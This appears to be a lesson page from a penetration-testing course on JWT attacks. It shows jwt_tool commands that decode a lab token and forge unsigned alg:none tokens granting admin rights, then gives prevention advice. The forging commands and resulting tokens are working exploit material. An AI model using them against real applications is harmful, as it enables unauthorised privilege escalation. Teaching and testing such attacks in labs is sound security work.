Attacking Authentication Mechanisms
Tools of the Trade & Vulnerability Prevention
This section will showcase tools that can aid us in identifying and exploiting JWT-based vulnerabilities. Furthermore, we will briefly explore how to prevent JWT-based vulnerabilities.
Tools of the Trade
Penetration testers commonly use jwt_tool to analyze and identify vulnerabilities in JWTs. The installation process only requires cloning the repository and installing the required dependencies:
[!bash!]$ git clone https://github.com/ticarpi/jwt_tool
[!bash!]$ pip3 install -r requirements.txt
We can then run the tool by executing the python script jwt_tool.py:
[!bash!]$ python3 jwt_tool/jwt_tool.py
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
No config file yet created.
Running config setup.
Configuration file built - review contents of "jwtconf.ini" to customise your options.
Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.
Let us take a look at the different functionalities the tool provides by calling its help flag:
[!bash!]$ python3 jwt_tool/jwt_tool.py -h
<SNIP>
-X EXPLOIT, --exploit EXPLOIT
eXploit known vulnerabilities:
a = alg:none
n = null signature
b = blank password accepted in signature
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk)
i = inject inline JWKS
<SNIP>
-C, --crack crack key for an HMAC-SHA token
(specify -d/-p/-kf)
-d DICT, --dict DICT dictionary file for cracking
-p PASSWORD, --password PASSWORD
password for cracking
-kf KEYFILE, --keyfile KEYFILE
keyfile for cracking (when signed with 'kid' attacks)
<SNIP>
From the output of jwt_tool.py, we know that it can analyze JWTs, brute-force JWT secrets, and perform other various attacks, including those discussed in previous sections.
JWT Analysis
We can analyze any given JWT with jwt_tool by providing it as an argument. Let us test it with a JWT from a previous section:
[!bash!]$ python3 jwt_tool/jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
=====================
Decoded Token Values:
=====================
Token header values:
[+] alg = "HS256"
[+] typ = "JWT"
Token payload values:
[+] user = "htb-stdnt"
[+] isAdmin = False
[+] exp = 1711186044 ==> TIMESTAMP = 2024-03-23 10:27:24 (UTC)
[-] TOKEN IS EXPIRED!
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
As we can see, the tool provides us with all the information contained in the JWT, including the JWT's header and the JWT's payload. It even lets us know that the token provided has already expired since the timestamp in the exp claim was in the past.
Forging JWTs
We can use jwt_tool to programmatically forge altered JWTs instead of doing so manually, as in the previous sections. For instance, we can forge a JWT which uses the none algorithm by specifying the -X a flag. Additionally, we can tell the tool to set the isAdmin claim to true by specifying the following flags: -pc isAdmin -pv true -I. Let us combine these flags to forge a JWT that enables us to obtain administrator privileges in the lab from the previous sections:
[!bash!]$ python3 jwt_tool/jwt_tool.py -X a -pc isAdmin -pv true -I eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
<SNIP>
jwttool_811c498343f37b0d48592a9743187ebf - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_fb9f8d45657b7264e23d8e17a2cc438e - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_c2d4f2dda19221badff0ee7d78e80575 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_367f25ee04f77adb0cb665bf07d80f3c - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
As we can see, the tool generated JWTs that use the none algorithm with various lower- and uppercase combinations, aiming to bypass potential blacklists. We can confirm that the token contains the claims we injected by analyzing it:
The JWT contains the none alg claim and the injected value for the isAdmin claim. Passing this token to the corresponding lab from a few sections ago grants us administrator privileges:
Feel free to revisit the previous sections and try to solve the labs with jwt_tool to get experience with the tool.
Vulnerability Prevention
It is crucial to abide by the following items to prevent vulnerabilities in JWT-based authentication implementations:
- Plan and document the JWT configuration that the web application uses. This configuration includes the signature algorithm as well as which claims are used by the web application
- Do not implement custom JWT handling logic. Instead, rely on established libraries to handle JWT operations such as signature generation, signature verification, and claim extraction. Ensure that the library used is up to date.
- Tie the JWT handling logic down to suit the corresponding JWT configuration. For instance, reject tokens that are not signed with the expected signature algorithm
- If claims such as the
jkuclaim are used, implement a whitelist of allowed hosts before fetching any data from remote origins to prevent SSRF vulnerabilities - Always include an expiration date within the
expclaim of the JWT to prevent JWTs from being valid indefinitely
Table of Contents
Introduction to Authentication Mechanisms
Introduction to Authentication MechanismsJWTs
Introduction to JWTs Attacking Signature Verification Attacking the Signing Secret Algorithm Confusion Further JWT Attacks JWT Tools of the Trade & Vulnerability PreventionOAuth
Introduction to OAuth OAuth Lab Setup Stealing Access Tokens Improper CSRF Protection Additional OAuth Vulnerabilities OAuth Vulnerability PreventionSAML
Introduction to SAML SAML Lab Setup Signature Exclusion Attack Signature Wrapping Attack Additional SAML Vulnerabilities SAML Tools of the Trade & Vulnerability PreventionSkills Assessment
Skills AssessmentMy Workstation
OFFLINE
/ 1 spawns left
